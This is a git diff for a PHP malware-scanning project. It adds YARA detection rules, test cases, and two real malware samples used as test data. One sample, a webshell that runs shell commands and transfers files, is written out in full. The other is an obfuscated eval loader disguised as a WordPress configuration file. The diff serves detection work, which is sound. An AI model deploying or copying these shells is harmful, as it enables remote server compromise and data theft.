6 files changed, 226 insertions, 0 deletions
diff --git a/README.md b/README.md
index 262c119..cda8857 100644
--- a/README.md
+++ b/README.md
@@ -39,6 +39,7 @@ The following list of encoders/obfuscators/webshells are also detected:
 * [tennc]( http://tennc.github.io/webshell/ )
 * [web-malware-collection]( https://github.com/nikicat/web-malware-collection )
 * [webtoolsvn]( http://www.webtoolsvn.com/en-decode/ )
+* [novahot]( https://github.com/chrisallenlane/novahot )
 Of course it's **trivial** to bypass PMF,
diff --git a/php-malware-finder/common.yar b/php-malware-finder/common.yar
index b47fb69..bde83c7 100644
--- a/php-malware-finder/common.yar
+++ b/php-malware-finder/common.yar
@@ -126,6 +126,7 @@ rule DodgyStrings
        $ = "slowloris" fullword nocase
        $ = "suhosin.executor.func.blacklist"
        $ = "sun-tzu" fullword nocase // Because quotes from the Art of War is mandatory for any cool webshell.
+                $ = /trojan (payload)?/
        $ = "uname -a" fullword
        $ = "visbot" nocase fullword
        $ = "warez" fullword nocase
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index 309af01..1238a95 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -33,6 +33,21 @@ global private rule IsPhp
        $php and filesize < 5MB
 }
+rule NonPrintableChars
+{
+        strings:
+                /*
+                Searching only for non-printable characters completely kills the perf,
+                so we have to use atoms (https://gist.github.com/Neo23x0/e3d4e316d7441d9143c7)
+                to get an acceptable speed.
+                */
+                $non_printables = /(function|return|base64_decode).{,256}[^\x20-\x7E]{3}/
+        condition:
+        (any of them) and not IsWhitelisted
+}
 rule PasswordProtection
 {
    strings:
diff --git a/php-malware-finder/samples/real/guidtz.php b/php-malware-finder/samples/real/guidtz.php
new file mode 100644
index 0000000..d482cb0
--- /dev/null
+++ b/php-malware-finder/samples/real/guidtz.php
@@ -0,0 +1,76 @@
+<?php 
+/*
+* The base configurations of the WordPress.
+ *
+ * This file has the following configurations: MySQL settings, Table Prefix,
+ * Secret Keys, and ABSPATH. You can find more information by visiting
+ * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
+ * Codex page. You can get the MySQL settings from your web host.
+ *
+ * This file is used by the wp-config.php creation script during the
+ * installation. 
+ *
+ * @package WordPress
+*/
+@error_reporting(0);@ini_set('display_errors',false);defined('���7���8�13530��') || define('���7���8�13530��',__FILE__);global $���7834�81�9�2�5;global $�53���6�9�7775��; if(!function_exists('�0�93���98511086')){ function �0�93���98511086($�9�2���2851�5�5�,$�71��34076112�06=''){ if(empty($�9�2���2851�5�5�)) return ''; $�9�2���2851�5�5�=base64_decode($�9�2���2851�5�5�); if($�71��34076112�06=='') return ~$�9�2���2851�5�5�; if($�71��34076112�06=='-1') @�7�16��2�923�895(); $��505��465�7�1�6=$GLOBALS['���7834�81�9�2�5']['�2���522259�6�2�']($�9�2���2851�5�5�); $�71��34076112�06=$GLOBALS['���7834�81�9�2�5']['�70�53233�19��66']($�71��34076112�06,$��505��465�7�1�6,$�71��34076112�06); return $�9�2���2851�5�5�^$�71��34076112�06; }} if(!function_exists('�8�18�3���9��1�8')){ function �8�18�3���9��1�8($�9�2���2851�5�5�,$�71��34076112�06=''){ if(empty($�9�2���2851�5�5�)) return ''; $�9�2���2851�5�5�=base64_decode($�9�2���2851�5�5�); if($�71��34076112�06=='') return ~$�9�2���2851�5�5�; if($�71��34076112�06=='-1') @��8�0�42��4�791�(); $��505��465�7�1�6=$GLOBALS['���7834�81�9�2�5']['�2���522259�6�2�']($�9�2���2851�5�5�); $�71��34076112�06=$GLOBALS['���7834�81�9�2�5']['�70�53233�19��66']($�71��34076112�06,$��505��465�7�1�6,$�71��34076112�06); return $�71��34076112�06^$�9�2���2851�5�5�; }}$���7834�81�9�2�5["�70�53233�19��66"]=�8�18�3���9��1�8('jIuNoI+emw==','');$���7834�81�9�2�5["�464120�78����0�"]=�8�18�3���9��1�8('nZ6MmsnLoJuanJCbmg==','');$���7834�81�9�2�5["�2���522259�6�2�"]=�8�18�3���9��1�8('jIuNk5qR','');$���7834�81�9�2�5["��77306821���256"]=�8�18�3���9��1�8('Gw4QPCMiFwoGLjQ=','HKBjfp');$���7834�81�9�2�5["�829���197593�77"]='';$���7834�81�9�2�5["�552�965�0�732�3"]=�8�18�3���9��1�8('ZiAFGwwjBCM=','6hUD_fHe9');$���7834�81�9�2�5["��0702�����8209�"]='';$���7834�81�9�2�5["�1��8�03324��362"]='';$���7834�81�9�2�5["�9��1528381�305�"]=�8�18�3���9��1�8('CzQTIBMXBz8AOxM=','XqAvVE');$���7834�81�9�2�5["�06648�177994296"]='';$���7834�81�9�2�5["��5�27�9076�9��6"]='';$���7834�81�9�2�5["�8790���27403321"]=�8�18�3���9��1�8('WFZYblllfXZ1d1lV','ldv_kTSCBY');$���7834�81�9�2�5["��9053��36�429�0"]='';$���7834�81�9�2�5["��3�5��1�2��3591"]=�8�18�3���9��1�8('DStf','nG67D');$���7834�81�9�2�5["�3�73��22�92�99�"]='';$���7834�81�9�2�5["�77��0�98�3�3283"]=�8�18�3���9��1�8('HA4VNhUDHQ8PHCs=','NKXyAFB');$���7834�81�9�2�5["�38�����5777�05�"]=�8�18�3���9��1�8('AxhnCDs7JiUc','KL3XdsivH');$���7834�81�9�2�5["�51�582���3����1"]='';$���7834�81�9�2�5["�8��301�93���080"]='';$���7834�81�9�2�5["�73606080��7414�"]=�8�18�3���9��1�8('FBlCWFItAUQGOgAQ','sc761Bl4t_');$���7834�81�9�2�5["��331074705��24�"]=�8�18�3���9��1�8('O14wQSA4','R0D7AT');$���7834�81�9�2�5["�4�1�9832�54978�"]=�8�18�3���9��1�8('HUYkECY6','n2VbCLrH');$���7834�81�9�2�5["���5�223�162�2�9"]=�8�18�3���9��1�8('JQI/ERwMNgAcCDwaNw49ADA=','CkSt');$���7834�81�9�2�5["���2�739�17��042"]=�8�18�3���9��1�8('GQAnKg==','miJOLV7G');$���7834�81�9�2�5["��88�0�8���48286"]=�8�18�3���9��1�8('GwEEPz9L','htfLK9uXy');  $�53���6�9�7775��['�2�4�7�4��85�74�']=$GLOBALS['���7834�81�9�2�5']['���2�739�17��042'](); $�53���6�9�7775��['��1�0���0736�02�']=$GLOBALS['���7834�81�9�2�5']['���5�223�162�2�9'](���7���8�13530��); $�53���6�9�7775��['��16�9�6�997��12']=$GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('2ef4d9904bd650312d329366c9fe69dc'); $�53���6�9�7775��['�72�1�1���69�0��']=$GLOBALS['���7834�81�9�2�5']['��331074705��24�']($GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('1094000000')); $�53���6�9�7775��['��77�7��7�6�752�']=$GLOBALS['���7834�81�9�2�5']['��331074705��24�']($GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('6100000000')); $�53���6�9�7775��['��9�570�4�805963']=$GLOBALS['���7834�81�9�2�5']['��331074705��24�']($GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('6600000000')); $�53���6�9�7775��['���16��7��189�6�']=$GLOBALS['���7834�81�9�2�5']['��331074705��24�']($GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('0123000000')); $�53���6�9�7775��['�541��13�7��7���']=$GLOBALS['���7834�81�9�2�5']['��88�0�8���48286']($�53���6�9�7775��['��1�0���0736�02�'],$�53���6�9�7775��['�72�1�1���69�0��'],$�53���6�9�7775��['���16��7��189�6�']); $�53���6�9�7775��['�541��13�7��7���']=$GLOBALS['���7834�81�9�2�5']['�464120�78����0�']($�53���6�9�7775��['�541��13�7��7���']); $�53���6�9�7775��['�541��13�7��7���']=$GLOBALS['���7834�81�9�2�5']['�73606080��7414�']($�53���6�9�7775��['�541��13�7��7���']); return(eval($�53���6�9�7775��['�541��13�7��7���'])); ?>
+#!/usr/bin/php -q
+eNrtWWtPW1cW/SsERTVoUHvej1La2MaOzRuDoU6EEHaMzdNpnNSEtl+StGmTn3OeP2/2hWikMcdw
+M5NpJ1Ilf7LuXXfts9dee59z7r82TirKvMJOWxL54+l3NHAtNWaO4oAJm95bsCpg5Wm08IzDVs0U
+VjfrJ2v9TnulvLNYmCs0RjuPas9KK/KHwuz8/ZuYvyFhFGNRa0+x9S6JubbdWSu9PDlb6xW7a4uD
+BcD9sb2/fJiGfBM88ZJqj6ULiJEkZGXUQaXRQgbVO2+1T9NQryIxVCpJo1SKGZOEWq9WuqvbJweN
+RbxWWuzJxeIV7D47bu0coQnACuPgSPDSay4DTgKvXDzZBqDS8HBlsb47SCN5RKxlVnArDBeGJpFK
+5ZNHa9uo2byO+GDzqNV4Kpp8AmSUwIkxSZhyFKUhK9vFbrmE8MPSsLbWO9mtvKwvlXutDL7RXVlM
+I7/l0qIYKYK4pfJpBT3ZHG3Xyq2T8kt+Uis1q+uXg5U67Xxf6beGS72rAESruHH0fH+CpkxUyqKg
+vDNMESWSX2kU6/3Ni9MqoMlRGZ2loRw1OvAodLBWEBySUEvl4ln9YthqnTG8vDgUy/1Op3Xek/Xj
+QX/9g8ZePB9s1wT+cYJkDaUYSSYRN4GwmPzM98cnLzfLuJkx3q2KFbU/TKO9d1oZzp1CXgRqUBKt
+fsHQ0iU6ALSN4+qEfP2utYtQQ4JQTS3TSaRqE7d3Lur9agOfNyujjfURKwLqUHF2WLucAEwZB+VK
+5pSM0aeBawi1VkpKrdb6mZWc6uPh2dZi/emEkvKOW0JoxIIYEtOQ9fLodPni5GhlcfBo6ajVWz0q
+nq8fN7MUVSv1tTSyNcwyBpbCmdIOpw1ldVE/rJeGZP0Yd+uXLEPcWmIri5X9Ok7DvgbQaJBzDEuw
+mXQx7Gx1msXio52N6upFJvzG4WkLTchWUNZKYZyTSBKEfHpRL4fnG6Xmcq28iorFesbzdL3Z6U2w
+l/cMReYk5N8aa8kEB9zu0J3eqLx2jM7Wryu0XmngrcHuhMgVV1JgRaSP3Ol0VZWPhsulRmsZwJpn
+5fpWGupXKn1wlGkbmQoqzW9pVHlav7zK8kW3slE9KMtBK40H3qSgG8VgsDJSpVVUbqiTzTKvAN7l
+yQ4qygn5CI67ICxShJrI02FW+qud5gihWqOT8Xv6bCA6zTTeHzhYhLW0zARnaJpb5aizu0ueN6q9
+zUr1uhP90HgiGbk8GU0wZWaw1YoSx5mWKm0+D9GovVYedQGur46q9UltDXkbRCCOaQddKQnV6uNB
+rV/pbfSvugVpqmLp4Hz/0YQESyqQQAqFKBmeYI3lC1Rb2hz1N/r1o3Jjs5SJuvdsebC21d6YYEAC
+SQS25qMQ0bB0bh72mo/WiqPacm+4BZCD0YvN9pPKhELxTkunBPZgvBKlk7NcHJ0tl5TYOO5loRfb
+L+tntf0JSnRIByg+Q4Xy0qarebfBn5TQoF+/zjR6yr7Xi9uyXQTMqfuBUxu8MNpLKbkzjwvvYCIi
+UqDoDTNIhsLewv2HK+ul4srW48I4h8Le48K4pxT2Zm5/YVxN2QspHlhE7YTXWhqLSWFvdq6g2xwz
+qdgThtuICqJw5+Cw3TlsK9LGSsnCXALpdcAWWfBR0IlDxADS/NTR4R0sx+evSSzHV2v23kK+aKYe
+vJXwr43EalCZ0nwmD69x+wFe+/vV+kplf3/uTQjSOKMippwiG4DLApr6+eep2yHHp4FbIb9ZQEDd
+R+WRYSQG6Hoax5m0mN54Aj0+evhpYYkFMR0Nh93nM/f3tyqNnUrjcXKiUsG7GDmgeJSZ4t7sdx/5
+wtczd3/nnfYec6Io/EUR93d+J/HC14XCddLudc+ePn85k2sNZmd/+iSVNz7YQ94KXydLIMEhb75y
+EX2M9uanfkkiIhMCQ15BxZNAfC4FvAtSUiQUwZBWwsXdmbn5AmQmHSJHhmiQMwYJO2ZyEfpVSucR
+hGCopyCAOwklXrgiBErZqG3sbxU36gsLqaYTqeHg3JFER7mGXR9o5WOklVX7A8eFhwQRG0UE7JBV
+52SQGwtyDWIphhFCQfoImBO7AvmlezrsfiShL76YevAbGKgTQoH/Qfez+KMJZSBWa48wdBhmuSSY
+XBGaund39t5zToAPj8hKSsJV9q4QDTgybKjAyrxV0oTPyID/EE7Bvgu2nDFQgfXMv9tQwiSV1Ci6
+ADsqRCnJlPU/tKE5sKFcHHIs+PjclO7EN1Uzl69f50hPPgI3nC4nAchm5EYZ5hDUhs5K5zMS4nso
+drAHaYk0Puprm7hdir9jA6uUKYB5B1PcRCn+IRmTKEgXFYUZEyJcQPN/smYTZOenDgfPugedfr6J
+cOpgmGxEASpXG0sDpho7GINhEe4uhrHdNhCf/mr6y1z4X07f/2o653jwLcqdEpwl/Crl+Z5fwJ+s
+5G7wzl9yv0kRmPbcgIGC6PFnVHJORk+pJURBJ6TxQyNMRP4qShkkbIvhX8mJu66fW2vzVdSI00zp
+gRHt0IfavH0HOHaKASHcYJ6cdm5+7GryeBOJh31tsJmVK2s+xJc4FPUceonTSMLmKrjsGPd2puOn
+qJms8sBm03Jq3+EkjZ7AcEGi1uYTff4m7F29PUE4m2/uIDN2CQJkZr/JBw4TYKc/SC1JVER72OBq
+yTWFoXx6b/7BW+VMwCBAjjlCxOfoEIkl+M8C+jYf+McF9I57hnB02BvvUNT/CuhzMI93zlvvYMxw
+EUfu3Z2DYwhIQtaMdU4RdLVcf/rgmOBwxXryHuLGMAaen297esex0Nh9X97G9GGV/9pB86dJKvdI
+CKYCllJrcGKRqdwgg7UQEkvPKQQBQvlsRG6xscpZ6ySyDJwnh+W8UtZSqGpNjXFIof/roTRB9u+h
+9L8bSlHWYO79xVPpxAJ9y8GsFTHGUOe8w1mBeoy85pEpjYQnjn9OBWqw4VIrG2D6DtryySMsZ1DL
+GOwWijmauw16/Go/naObdwJzqceMJBE70KkVOiILqfxH4qm3sJbChOxgX+kgTPqpN05DzFmhKMS1
+oOmnbo7ss+mj2o9emNdMMExA9QriNsjeeU8zfgOfXsmbPD4V4fF7vdzfn5961n3+4tn5TPfHg9P8
+nL/79p9HxrWSVUF5cDA4Zm9WOUpIeEdpWk9tTmpCZXRLYjNTdTJYaHdZYW56TEQ3RlE2UnJQbEM0
+rAdgIpyl2xtLif9G9VTXbVcXcSMeT+V4ReDHNHXJxQQtpexjv8NfquP2PXaZVn6czpmenU28nGxm
+y+ONQw5EDidJs+ziX6si3c7rGr9+N2OlikchMepepQIn+U6k8WtuFJOwBdZEmQXWX4UCbCOIwTBH
+EMjHjtlyFDuBNRIIDBRoy0vpjNtDDG4y78w/unf2gwiLibwRyORGAbgvXLdMFPkFudVh1R/mwodl
+Bt1aKu3W8kyIcenL0E6b0zHSmPntJAPncvV32ksHLktYVbfFxFRZZBBbljido0zXf5ETCTDyAxVF
+qIap11SdVcnaCqKLOdwu0rvQeX/HzKgPgX47H0+aFdJadt4dMGRgcKFTDcLKRlSXayHl7YcyJl5h
+ls5U1GeWSJbQGhvC2lhdIA5eG6aloPisU3olALz5PRV2L3uVDUaA+1BdtP+/0Y5UTVpEOlUxcVEC
+LMuG/JvbOA4PutniKbRKTRIUUinnSh1btI4ymEUJA7X9h58//Q+Pal3JKjFBzWwacNmkzFQzv3KD
+mG9flxzPkXPLMIVTVhVz73nHfTRHfHlHuUkXuxy4rYcluPfXHLEDVeNpRdJLtKzKswEHOyKKocca
+muK5XLCaOiXFVwM2KYiy2UXeeJX7QWtK5d+neEnhBb5hLAA1lihAr2R9y4FReBSJYiJYc+GVMuCk
+YXDWvuPSYUcB/ztA35t0buyWvSPLkvRe/LGxP1vCA/se1o7A/S1urhgivA+M7483kDAkdR/yconw
+J0c3hPQk1QNHCOx5eaSzr5PpyMinhaUg9uzFwPIjrvuKAJiedmrbeePbotF9/fQG56b1PddBeuVv
+dlhdN8VPstsSb6ojoTvp1HnvhHZzjso97zXXAfiwWcEdsJaJ5gt8klVOAu/tqCWq9OQVRtrXV7Xz
+7Cr1DZmmf1C/0A6ACqjy4ArUaW4S1eXhOYjd629jmphkP3zm7x0o9c1PjPpa+5umkf+/T87S+67f
+DldivnXVk/1Ce4BaBUr98Frd9CdNw9MJIwEos6CrgUwqxKCDlT2o50g9lCy53/X1+28awvDdGjf0
+vqZx4/xfETz+swxjWkwrwfMUPs5xuFFAJFESTEWGZL/3C44pT8DwOgXcVRMMTAYEflRhnjL9Iuqh
+oFiw8KFBTjSQa+2P5uQrlzMggBl2rl72oS6mru8ad2QnQmngadsBQAwOqKYCa2Awep08EKR8ppFB
+YTKY7Geso8iShLmL/QXbtCswu8Tv+SDbrGc99l94uC6J
diff --git a/php-malware-finder/samples/real/novahot.php b/php-malware-finder/samples/real/novahot.php
new file mode 100644
index 0000000..a330580
--- /dev/null
+++ b/php-malware-finder/samples/real/novahot.php
@@ -0,0 +1,130 @@
+<?php
+# Tested on PHP 5.4.45 on Debian Wheezy.
+#
+# To test this trojan locally, run the following in the directory containing 
+# this file:
+#   php -S localhost:<port>
+# TODO: Change this password. Don't leave the default!
+define('PASSWORD', 'the-password');
+# Override the default error handling to:
+#   1. Bludgeon PHP `throw`-ing rather than logging errors
+#   2. Keep noise out of the error logs
+set_error_handler('warning_handler', E_WARNING);
+function warning_handler($errno, $errstr) { 
+    throw new ErrorException($errstr);
+}
+# get the POSTed JSON input
+$post = json_decode(file_get_contents('php://input'), true);
+$cwd  = ($post['cwd'] !== '') ? $post['cwd'] : getcwd();
+# feign non-existence if the authentication is invalid
+if (!isset($post['auth']) || $post['auth'] !== PASSWORD) {
+    header('HTTP/1.0 404 Not Found');
+    die();
+}
+# return JSON to the client
+header('content-type: application/json');
+# if `cmd` is a trojan payload, execute it
+if (function_exists($post['cmd'])) {
+    $post['cmd']($cwd, $post['args']);
+}
+# otherwise, execute a shell command
+else {
+    $output = [];
+    # execute the command
+    $cmd = "cd $cwd; {$post['cmd']} 2>&1; pwd";
+    exec($cmd, $output);
+    $cwd = array_pop($output);
+    $response = [
+        'stdout' => $output,
+        'stderr' => [],
+        'cwd'    => $cwd,
+    ];
+    die(json_encode($response));
+}
+# File-download payload
+function payload_download ($cwd, $args) {
+    # cd to the trojan's cwd 
+    chdir($cwd);
+    # open the file as binary, and base64-encode its contents
+    try {
+        $stdout = base64_encode(file_get_contents($args['file']));
+        $stderr = [];
+    }
+    
+    # notify the client on failure
+    catch (ErrorException $e) {
+        $stdout = [];
+        $stderr = [ 'Could not download file.', $e->getMessage() ];
+    }
+    die(json_encode([
+        'stdout' => $stdout,
+        'stderr' => $stderr,
+        'cwd'    => $cwd,
+    ]));
+}
+# File-upload payload
+function payload_upload ($cwd, $args) {
+    # cd to the trojan's cwd 
+    chdir($cwd);
+    # base64-decode the uploaded bytes, and write them to a file
+    try {
+        file_put_contents( $args['dst'], base64_decode($args['data']));
+        $stderr = [];
+        $stdout = [ "File saved to {$args['dst']}." ];
+    }
+    
+    # notify the client on failure
+    catch (ErrorException $e) {
+        $stdout = [];
+        $stderr = [ 'Could not save file.', $e->getMessage() ];
+    }
+    die(json_encode([
+        'stdout' => $stdout,
+        'stderr' => $stderr,
+        'cwd'    => $cwd,
+    ]));
+}
+# Trojan autodestruct
+function payload_autodestruct ($cwd, $args) {
+    # attempt to delete the trojan
+    try {
+        unlink(__FILE__);
+        $stdout = [ 'File ' . __FILE__ . ' has autodestructed.' ];
+        $stderr = [];
+    }
+    
+    # notify the client on failure
+    catch (ErrorException $e) {
+        $stdout = [];
+        $stderr = [ 'File ' . __FILE__ . ' could not autodestruct.'];
+    }
+    die(json_encode([
+        'stdout' => [ 'Instructed ' . __FILE__ . ' to autodestruct.' ],
+        'stderr' => [],
+        'cwd'    => $cwd,
+    ]));
+}
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index 6928e65..c973196 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -90,6 +90,9 @@ run_test artificial/bypasses.php "0x132:\$var_as_func: \$_POST\['funct'\]("
 # real
 run_test real/sucuri_2014_04.php '0x67:$execution3:'
+run_test real/novahot.php 'DodgyStrings'
+run_test real/guidtz.php '0x12d8:$non_printables:'
+run_test real/guidtz.php 'NonPrintableChars'
 # Asp files
 run_test_asp classic/cmdasp.asp 'DodgyStrings'

diff --git a/README.md b/README.md index 262c119..cda8857 100644 --- a/README.md +++ b/README.md
@@ -39,6 +39,7 @@ The following list of encoders/obfuscators/webshells are also detected:
39	* [tennc]( http://tennc.github.io/webshell/ )	39	* [tennc]( http://tennc.github.io/webshell/ )
40	* [web-malware-collection]( https://github.com/nikicat/web-malware-collection )	40	* [web-malware-collection]( https://github.com/nikicat/web-malware-collection )
41	* [webtoolsvn]( http://www.webtoolsvn.com/en-decode/ )	41	* [webtoolsvn]( http://www.webtoolsvn.com/en-decode/ )
		42	* [novahot]( https://github.com/chrisallenlane/novahot )
42		43
43		44
44	Of course it's trivial to bypass PMF,	45	Of course it's trivial to bypass PMF,


diff --git a/php-malware-finder/common.yar b/php-malware-finder/common.yar index b47fb69..bde83c7 100644 --- a/php-malware-finder/common.yar +++ b/php-malware-finder/common.yar
@@ -126,6 +126,7 @@ rule DodgyStrings
126	$ = "slowloris" fullword nocase	126	$ = "slowloris" fullword nocase
127	$ = "suhosin.executor.func.blacklist"	127	$ = "suhosin.executor.func.blacklist"
128	$ = "sun-tzu" fullword nocase // Because quotes from the Art of War is mandatory for any cool webshell.	128	$ = "sun-tzu" fullword nocase // Because quotes from the Art of War is mandatory for any cool webshell.
		129	$ = /trojan (payload)?/
129	$ = "uname -a" fullword	130	$ = "uname -a" fullword
130	$ = "visbot" nocase fullword	131	$ = "visbot" nocase fullword
131	$ = "warez" fullword nocase	132	$ = "warez" fullword nocase


diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar index 309af01..1238a95 100644 --- a/php-malware-finder/php.yar +++ b/php-malware-finder/php.yar
@@ -33,6 +33,21 @@ global private rule IsPhp
33	$php and filesize < 5MB	33	$php and filesize < 5MB
34	}	34	}
35		35
		36	rule NonPrintableChars
		37	{
		38	strings:
		39	/*
		40	Searching only for non-printable characters completely kills the perf,
		41	so we have to use atoms (https://gist.github.com/Neo23x0/e3d4e316d7441d9143c7)
		42	to get an acceptable speed.
		43	*/
		44	$non_printables = /(function\|return\|base64_decode).{,256}[^\x20-\x7E]{3}/
		45
		46	condition:
		47	(any of them) and not IsWhitelisted
		48	}
		49
		50
36	rule PasswordProtection	51	rule PasswordProtection
37	{	52	{
38	strings:	53	strings:


diff --git a/php-malware-finder/samples/real/guidtz.php b/php-malware-finder/samples/real/guidtz.php new file mode 100644 index 0000000..d482cb0 --- /dev/null +++ b/php-malware-finder/samples/real/guidtz.php
@@ -0,0 +1,76 @@
		1	<?php
		2	/*
		3	* The base configurations of the WordPress.
		4	*
		5	* This file has the following configurations: MySQL settings, Table Prefix,
		6	* Secret Keys, and ABSPATH. You can find more information by visiting
		7	* {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
		8	* Codex page. You can get the MySQL settings from your web host.
		9	*
		10	* This file is used by the wp-config.php creation script during the
		11	* installation.
		12	*
		13	* @package WordPress
		14	*/
		15	@error_reporting(0);@ini_set('display_errors',false);defined('��7��8�13530��') \|\| define('��7��8�13530��',__FILE__);global $��7834�81�9�2�5;global $�53��6�9�7775��; if(!function_exists('�0�93��98511086')){ function �0�93��98511086($�9�2��2851�5�5�,$�71��34076112�06=''){ if(empty($�9�2��2851�5�5�)) return ''; $�9�2��2851�5�5�=base64_decode($�9�2��2851�5�5�); if($�71��34076112�06=='') return ~$�9�2��2851�5�5�; if($�71��34076112�06=='-1') @�7�16��2�923�895(); $��505��465�7�1�6=$GLOBALS['��7834�81�9�2�5']['�2��522259�6�2�']($�9�2��2851�5�5�); $�71��34076112�06=$GLOBALS['��7834�81�9�2�5']['�70�53233�19��66']($�71��34076112�06,$��505��465�7�1�6,$�71��34076112�06); return $�9�2��2851�5�5�^$�71��34076112�06; }} if(!function_exists('�8�18�3��9��1�8')){ function �8�18�3��9��1�8($�9�2��2851�5�5�,$�71��34076112�06=''){ if(empty($�9�2��2851�5�5�)) return ''; $�9�2��2851�5�5�=base64_decode($�9�2��2851�5�5�); if($�71��34076112�06=='') return ~$�9�2��2851�5�5�; if($�71��34076112�06=='-1') @��8�0�42��4�791�(); $��505��465�7�1�6=$GLOBALS['��7834�81�9�2�5']['�2��522259�6�2�']($�9�2��2851�5�5�); $�71��34076112�06=$GLOBALS['��7834�81�9�2�5']['�70�53233�19��66']($�71��34076112�06,$��505��465�7�1�6,$�71��34076112�06); return $�71��34076112�06^$�9�2��2851�5�5�; }}$��7834�81�9�2�5["�70�53233�19��66"]=�8�18�3��9��1�8('jIuNoI+emw==','');$��7834�81�9�2�5["�464120�78��0�"]=�8�18�3��9��1�8('nZ6MmsnLoJuanJCbmg==','');$��7834�81�9�2�5["�2��522259�6�2�"]=�8�18�3��9��1�8('jIuNk5qR','');$��7834�81�9�2�5["��77306821��256"]=�8�18�3��9��1�8('Gw4QPCMiFwoGLjQ=','HKBjfp');$��7834�81�9�2�5["�829��197593�77"]='';$��7834�81�9�2�5["�552�965�0�732�3"]=�8�18�3��9��1�8('ZiAFGwwjBCM=','6hUD_fHe9');$��7834�81�9�2�5["��0702��8209�"]='';$��7834�81�9�2�5["�1��8�03324��362"]='';$��7834�81�9�2�5["�9��1528381�305�"]=�8�18�3��9��1�8('CzQTIBMXBz8AOxM=','XqAvVE');$��7834�81�9�2�5["�06648�177994296"]='';$��7834�81�9�2�5["��5�27�9076�9��6"]='';$��7834�81�9�2�5["�8790��27403321"]=�8�18�3��9��1�8('WFZYblllfXZ1d1lV','ldv_kTSCBY');$��7834�81�9�2�5["��9053��36�429�0"]='';$��7834�81�9�2�5["��3�5��1�2��3591"]=�8�18�3��9��1�8('DStf','nG67D');$��7834�81�9�2�5["�3�73��22�92�99�"]='';$��7834�81�9�2�5["�77��0�98�3�3283"]=�8�18�3��9��1�8('HA4VNhUDHQ8PHCs=','NKXyAFB');$��7834�81�9�2�5["�38��5777�05�"]=�8�18�3��9��1�8('AxhnCDs7JiUc','KL3XdsivH');$��7834�81�9�2�5["�51�582��3��1"]='';$��7834�81�9�2�5["�8��301�93��080"]='';$��7834�81�9�2�5["�73606080��7414�"]=�8�18�3��9��1�8('FBlCWFItAUQGOgAQ','sc761Bl4t_');$��7834�81�9�2�5["��331074705��24�"]=�8�18�3��9��1�8('O14wQSA4','R0D7AT');$��7834�81�9�2�5["�4�1�9832�54978�"]=�8�18�3��9��1�8('HUYkECY6','n2VbCLrH');$��7834�81�9�2�5["��5�223�162�2�9"]=�8�18�3��9��1�8('JQI/ERwMNgAcCDwaNw49ADA=','CkSt');$��7834�81�9�2�5["��2�739�17��042"]=�8�18�3��9��1�8('GQAnKg==','miJOLV7G');$��7834�81�9�2�5["��88�0�8��48286"]=�8�18�3��9��1�8('GwEEPz9L','htfLK9uXy'); $�53��6�9�7775��['�2�4�7�4��85�74�']=$GLOBALS['��7834�81�9�2�5']['��2�739�17��042'](); $�53��6�9�7775��['��1�0��0736�02�']=$GLOBALS['��7834�81�9�2�5']['��5�223�162�2�9'](��7��8�13530��); $�53��6�9�7775��['��16�9�6�997��12']=$GLOBALS['��7834�81�9�2�5']['�4�1�9832�54978�']('2ef4d9904bd650312d329366c9fe69dc'); $�53��6�9�7775��['�72�1�1��69�0��']=$GLOBALS['��7834�81�9�2�5']['��331074705��24�']($GLOBALS['��7834�81�9�2�5']['�4�1�9832�54978�']('1094000000')); $�53��6�9�7775��['��77�7��7�6�752�']=$GLOBALS['��7834�81�9�2�5']['��331074705��24�']($GLOBALS['��7834�81�9�2�5']['�4�1�9832�54978�']('6100000000')); $�53��6�9�7775��['��9�570�4�805963']=$GLOBALS['��7834�81�9�2�5']['��331074705��24�']($GLOBALS['��7834�81�9�2�5']['�4�1�9832�54978�']('6600000000')); $�53��6�9�7775��['��16��7��189�6�']=$GLOBALS['��7834�81�9�2�5']['��331074705��24�']($GLOBALS['��7834�81�9�2�5']['�4�1�9832�54978�']('0123000000')); $�53��6�9�7775��['�541��13�7��7��']=$GLOBALS['��7834�81�9�2�5']['��88�0�8��48286']($�53��6�9�7775��['��1�0��0736�02�'],$�53��6�9�7775��['�72�1�1��69�0��'],$�53��6�9�7775��['��16��7��189�6�']); $�53��6�9�7775��['�541��13�7��7��']=$GLOBALS['��7834�81�9�2�5']['�464120�78��0�']($�53��6�9�7775��['�541��13�7��7��']); $�53��6�9�7775��['�541��13�7��7��']=$GLOBALS['��7834�81�9�2�5']['�73606080��7414�']($�53��6�9�7775��['�541��13�7��7��']); return(eval($�53��6�9�7775��['�541��13�7��7��'])); ?>
		16
		17	#!/usr/bin/php -q
		18	eNrtWWtPW1cW/SsERTVoUHvej1La2MaOzRuDoU6EEHaMzdNpnNSEtl+StGmTn3OeP2/2hWikMcdw
		19	M5NpJ1Ilf7LuXXfts9dee59z7r82TirKvMJOWxL54+l3NHAtNWaO4oAJm95bsCpg5Wm08IzDVs0U
		20	VjfrJ2v9TnulvLNYmCs0RjuPas9KK/KHwuz8/ZuYvyFhFGNRa0+x9S6JubbdWSu9PDlb6xW7a4uD
		21	BcD9sb2/fJiGfBM88ZJqj6ULiJEkZGXUQaXRQgbVO2+1T9NQryIxVCpJo1SKGZOEWq9WuqvbJweN
		22	RbxWWuzJxeIV7D47bu0coQnACuPgSPDSay4DTgKvXDzZBqDS8HBlsb47SCN5RKxlVnArDBeGJpFK
		23	5ZNHa9uo2byO+GDzqNV4Kpp8AmSUwIkxSZhyFKUhK9vFbrmE8MPSsLbWO9mtvKwvlXutDL7RXVlM
		24	I7/l0qIYKYK4pfJpBT3ZHG3Xyq2T8kt+Uis1q+uXg5U67Xxf6beGS72rAESruHH0fH+CpkxUyqKg
		25	vDNMESWSX2kU6/3Ni9MqoMlRGZ2loRw1OvAodLBWEBySUEvl4ln9YthqnTG8vDgUy/1Op3Xek/Xj
